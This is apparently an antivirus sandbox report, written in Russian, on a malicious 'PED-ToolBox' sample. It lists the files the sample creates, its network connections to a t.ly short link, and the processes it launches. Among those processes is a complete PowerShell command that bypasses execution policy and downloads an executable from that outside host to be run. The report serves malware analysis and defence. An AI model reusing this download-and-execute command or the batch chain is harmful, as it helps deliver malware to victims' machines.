Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- https://t.ly/pedmenu как %allusersprofile%\pedtoolbox\peddownload\files\cmdmenusel.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\rarsfx0\ped-toolbox2.bat
- %ALLUSERSPROFILE%\pedtoolbox\ped-toolbox.bat
- nul
Перемещает следующие файлы
- %TEMP%\rarsfx0\ped-toolbox2.bat в %TEMP%\rarsfx0\ped-toolbox.bat
Сетевая активность
Подключается к
- 't.#y':443
TCP
Другие
- 't.#y':443
UDP
- DNS ASK t.#y
Другое
Ищет следующие окна
- ClassName: 'EDIT' WindowName: ''
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\RarSFX0\PED-ToolBox2.bat" "
- '%WINDIR%\syswow64\cmd.exe' /c "ren "%TEMP%\RarSFX0\PED-ToolBox2.bat" "PED-ToolBox.bat""
- '%WINDIR%\syswow64\cmd.exe' /c "%TEMP%\RarSFX0\PED-ToolBox.bat"
- '%WINDIR%\syswow64\timeout.exe' 15
- '%WINDIR%\syswow64\cmd.exe' /K "%ALLUSERSPROFILE%\PEDToolBox\PED-ToolBox.bat"
- '%WINDIR%\syswow64\net.exe' FILE
- '%WINDIR%\syswow64\net1.exe' FILE
- '%WINDIR%\syswow64\cmd.exe' /c %ALLUSERSPROFILE%\PEDToolBox\PED-ToolBox.bat max
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('https://t.ly/pedmenu', '%ALLUSERSPROFILE%\PEDToolBox\pedDownload\files\cmdMenuSel.exe');"
